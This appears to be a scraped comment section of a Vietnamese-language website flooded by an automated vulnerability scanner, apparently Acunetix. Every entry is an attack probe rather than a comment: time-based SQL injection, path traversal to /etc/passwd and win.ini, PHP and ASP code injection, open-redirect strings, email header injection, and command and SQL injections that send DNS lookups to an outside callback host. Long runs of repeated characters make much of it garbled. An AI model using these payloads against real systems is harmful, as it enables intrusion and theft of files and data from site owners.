'||UTL_INADDR.get_host_address('dns.'||'sqli.016551.2-210.2.a0774.1.bxss'||'.me')||'
e 8 Thángs trước
/\www.vulnweb.com
post-comment 8 Thángs trước
e 8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
e 8 Thángs trước
e 8 Thángs trước
//www.vulnweb.com
8 Thángs trước
1||UTL_INADDR.get_host_address('dns.'||'sqli.016551.2-209.2.a0774.1.bxss'||'.me')
post-comment 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
../../../../../../../../../../etc/passwd.jpg
e 8 Thángs trước
http://www.vulnweb.com
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
axdMaHu2'));select pg_sleep(21); --
e 8 Thángs trước
'"
post-comment/. 8 Thángs trước
e 8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
e 8 Thángs trước
990505
e 8 Thángs trước
8 Thángs trước
swkNu21P');select pg_sleep(14); --
post-comment 8 Thángs trước
e 8 Thángs trước
../../../../../../../../../../../../../../../proc/version
8 Thángs trước
e 8 Thángs trước
/www.vulnweb.com
8 Thángs trước
/\www.vulnweb.com
e 8 Thángs trước
../../../../../../../../../../etc/passwd
e 8 Thángs trước
8 Thángs trước
'"
post-comment 8 Thángs trước
8 Thángs trước
CzFQoBM2';select pg_sleep(14); --
e 8 Thángs trước
8 Thángs trước
WEB-INF\web.xml
8 Thángs trước
-1));select pg_sleep(14); --
8 Thángs trước
//www.vulnweb.com
e 8 Thángs trước
8 Thángs trước
WEB-INF/web.xml
8 Thángs trước
http://www.vulnweb.com
8 Thángs trước
-1);select pg_sleep(14); --
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
8 Thángs trước
967097
8 Thángs trước
-1;select pg_sleep(14); --
8 Thángs trước
8 Thángs trước
8 Thángs trước
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
8 Thángs trước
8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
8 Thángs trước
Xwk5Ji7s'; waitfor delay '0:0:14' --
e 8 Thángs trước
8 Thángs trước
/www.vulnweb.com
8 Thángs trước
8 Thángs trước
1 waitfor delay '0:0:7' --
e 8 Thángs trước
8 Thángs trước
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
e 8 Thángs trước
8 Thángs trước
-1); waitfor delay '0:0:7' --
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
..\..\..\..\..\..\..\..\windows\win.ini
8 Thángs trước
-1; waitfor delay '0:0:7' --
e 8 Thángs trước
8 Thángs trước
................windowswin.ini
e 8 Thángs trước
e 8 Thángs trước
JyI=
8 Thángs trước
(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/
8 Thángs trước
e 8 Thángs trước
)))))))))))))))))))))))))))))))))))))))))))))))))) 8 Thángs trước
e 8 Thángs trước
@@vcC3e
8 Thángs trước
if(now()=sysdate(),sleep(7),0)/*'XOR(if(now()=sysdate(),sleep(7),0))OR'"XOR(if(now()=sysdate(),sleep(7),0))OR"*/
8 Thángs trước
../../../../../../../../../../windows/win.ini.jpg
)))))))))))))))))))))))))))))))))))))))))))))))))) 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
1
8 Thángs trước
-1 OR 3*2>(0+5+300-300)
8 Thángs trước
C:\WINDOWS\system32\drivers\etc\hosts
8 Thángs trước
e 8 Thángs trước
\
8 Thángs trước
-1 OR 3*2<(0+5+300-300)
8 Thángs trước
../../../../../../../../../../windows/win.ini
8 Thángs trước
e 8 Thángs trước
1'"
8 Thángs trước
-1 OR 3+300-300-1=0+0+0+1
8 Thángs trước
WEB-INF\web.xml
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
-1 OR 2+300-300-1=0+0+0+1
8 Thángs trước
8 Thángs trước
/WEB-INF/web.xml
8 Thángs trước
8 Thángs trước
-1 OR 3*2>(0+5+345-345) --
8 Thángs trước
8 Thángs trước
WEB-INF/web.xml
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
JyI=
8 Thángs trước
/\../\../\../\../\../\../\../etc/passwd
8 Thángs trước
8 Thángs trước
-1 OR 3*2<(0+5+345-345) --
e 8 Thángs trước
8 Thángs trước
@@bB30t
8 Thángs trước
-1 OR 3+345-345-1=0+0+0+1 --
e 8 Thángs trước
8 Thángs trước
file:///etc/passwd
8 Thángs trước
1
8 Thángs trước
-1 OR 2+345-345-1=0+0+0+1 --
e 8 Thángs trước
8 Thángs trước
1*1*1*1
8 Thángs trước
\
8 Thángs trước
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
8 Thángs trước
1*1*1*1
8 Thángs trước
1'"
8 Thángs trước
8 Thángs trước
..
8 Thángs trước
1*1*1*1
8 Thángs trước
8 Thángs trước
1*1*1*1
8 Thángs trước
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
e 8 Thángs trước
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
8 Thángs trước
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
8 Thángs trước
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
8 Thángs trước
DDFlVp2w
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
/.././.././.././.././.././.././.././../etc/./passwd%00
8 Thángs trước
1
8 Thángs trước
8 Thángs trước
%2fetc%2fpasswd
8 Thángs trước
1
8 Thángs trước
/etc/passwd
8 Thángs trước
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
e 8 Thángs trước
8 Thángs trước
/../..//../..//../..//../..//../..//etc/passwd.jpg
e 8 Thángs trước
8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
e 8 Thángs trước
${@print(md5(acunetix_wvs_security_test))}\ 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
../../../../../../../../../../etc/passwd.jpg
8 Thángs trước
8 Thángs trước
${@print(md5(acunetix_wvs_security_test))} 8 Thángs trước
8 Thángs trước
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
8 Thángs trước
";print(md5(acunetix_wvs_security_test));$a=" 8 Thángs trước
';print(md5(acunetix_wvs_security_test));$a=' 8 Thángs trước
8 Thángs trước
../../../../../../../../../../../../../../../proc/version
http://hitwURGGm5tyR.bxss.me/ 8 Thángs trước
8 Thángs trước
;print(md5(acunetix_wvs_security_test)); 8 Thángs trước
8 Thángs trước
../../../../../../../../../../etc/passwd
http://hitS5fi9MUMhd.bxss.me/ 8 Thángs trước
${@print(md5(acunetix_wvs_security_test))}\ 8 Thángs trước
e 8 Thángs trước
${@print(md5(acunetix_wvs_security_test))} 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
";print(md5(acunetix_wvs_security_test));$a=" 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
post-comment/.
e 8 Thángs trước
';print(md5(acunetix_wvs_security_test));$a=' 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
post-comment
8 Thángs trước
e 8 Thángs trước
post-comment
;print(md5(acunetix_wvs_security_test)); 8 Thángs trước
8 Thángs trước
8 Thángs trước
post-comment/.
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
post-comment
http://testasp.vulnweb.com/t/xss.html?%00.jpg 8 Thángs trước
8 Thángs trước
8 Thángs trước
post-comment
http://testasp.vulnweb.com/t/xss.html?%00.jpg 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
http://hitlIzKnpwBpe.bxss.me/
8 Thángs trước
http://hitju6rSGt1hB.bxss.me/
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
http://testasp.vulnweb.com/t/xss.html?%00.jpg
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
http://testasp.vulnweb.com/t/xss.html?%00.jpg
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
testasp.vulnweb.com 8 Thángs trước
http://testasp.vulnweb.com/t/fit.txt?.jpg 8 Thángs trước
8 Thángs trước
Http://testasp.vulnweb.com/t/fit.txt 8 Thángs trước
8 Thángs trước
1some_inexistent_file_with_long_name.jpg 8 Thángs trước
http://some-inexistent-website.acu/some_inexistent 8 Thángs trước
e 8 Thángs trước
^(#$!@#$)(()))****** 8 Thángs trước
testasp.vulnweb.com 8 Thángs trước
!(()&&!|*|*| 8 Thángs trước
e 8 Thángs trước
http://testasp.vulnweb.com/t/fit.txt?.jpg 8 Thángs trước
) 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
Http://testasp.vulnweb.com/t/fit.txt 8 Thángs trước
e 8 Thángs trước
&nslookup dns.ce.\016551.2-140.2.a0774.\1.bxss.me& 8 Thángs trước
^(#$!@#$)(()))****** 8 Thángs trước
1some_inexistent_file_with_long_name.jpg 8 Thángs trước
8 Thángs trước
!(()&&!|*|*| 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
$(nslookup dns.ce.\016551.2-137.2.a0774.\1.bxss.me 8 Thángs trước
http://some-inexistent-website.acu/some_inexistent 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
) 8 Thángs trước
8 Thángs trước
set|set&set 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
&nslookup dns.ce.\016551.2-131.2.a0774.\1.bxss.me& 8 Thángs trước
8 Thángs trước
8 Thángs trước
$(nslookup dns.ce.\016551.2-128.2.a0774.\1.bxss.me 8 Thángs trước
set|set&set 8 Thángs trước
'"() 8 Thángs trước
'"() 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
${@print(md5(acunetix_wvs_security_test))}\
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
${@print(md5(acunetix_wvs_security_test))}
to@example.com> bcc:016551.2-108.2.a0774.1@bxss.m 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
e 8 Thángs trước
";print(md5(acunetix_wvs_security_test));$a="
e'>">
8 Thángs trước
to@example.com> bcc:016551.2-101.2.a0774.1@bxss.m 8 Thángs trước
8 Thángs trước
${@print(md5(acunetix_wvs_security_test))}\
e'>">
e 8 Thángs trước
8 Thángs trước
";print(md5(acunetix_wvs_security_test));$a="
e 8 Thángs trước
8 Thángs trước
';print(md5(acunetix_wvs_security_test));$a='
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
;print(md5(acunetix_wvs_security_test));
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
e 8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
"+response.write(9587891*9787343)+" 8 Thángs trước
e 8 Thángs trước
^(#$!@#$)(()))******
'+response.write(9587891*9787343)+' 8 Thángs trước
e 8 Thángs trước
!(()&&!|*|*|
e 8 Thángs trước
e 8 Thángs trước
response.write(9587891*9787343) 8 Thángs trước
e 8 Thángs trước
)
"+response.write(9195673*9205715)+" 8 Thángs trước
8 Thángs trước
^(#$!@#$)(()))******
'+response.write(9195673*9205715)+' 8 Thángs trước
e 8 Thángs trước
'"()
e 8 Thángs trước
8 Thángs trước
!(()&&!|*|*|
e 8 Thángs trước
response.write(9195673*9205715) 8 Thángs trước
8 Thángs trước
)
8 Thángs trước
8 Thángs trước
8 Thángs trước
8 Thángs trước
'"()
8 Thángs trước
e 8 Thángs trước
&nslookup dns.ce.\016551.2-47.2.a0774.\1.bxss.me&'\"`0&nslookup dns.ce.\016551.2-47.2.a0774.\1.bxss.me&`'
e 8 Thángs trước
$(nslookup dns.ce.\016551.2-45.2.a0774.\1.bxss.me)
e 8 Thángs trước
set|set&set
e 8 Thángs trước
'>">
8 Thángs trước
&nslookup dns.ce.\016551.2-39.2.a0774.\1.bxss.me&'\"`0&nslookup dns.ce.\016551.2-39.2.a0774.\1.bxss.me&`'
e 8 Thángs trước
8 Thángs trước
$(nslookup dns.ce.\016551.2-36.2.a0774.\1.bxss.me)
e 8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
to@example.com> bcc:016551.2-34.2.a0774.1@bxss.me
e 8 Thángs trước
e 8 Thángs trước
testasp.vulnweb.com
e 8 Thángs trước
8 Thángs trước
'>">
e 8 Thángs trước
bcc:016551.2-30.2.a0774.1@bxss.me
8 Thángs trước
8 Thángs trước
8 Thángs trước
set|set&set
e 8 Thángs trước
http://testasp.vulnweb.com/t/fit.txt?.jpg
8 Thángs trước
to@example.com> bcc:016551.2-29.2.a0774.1@bxss.me
8 Thángs trước
e 8 Thángs trước
e 8 Thángs trước
Http://testasp.vulnweb.com/t/fit.txt
8 Thángs trước
8 Thángs trước
bcc:016551.2-24.2.a0774.1@bxss.me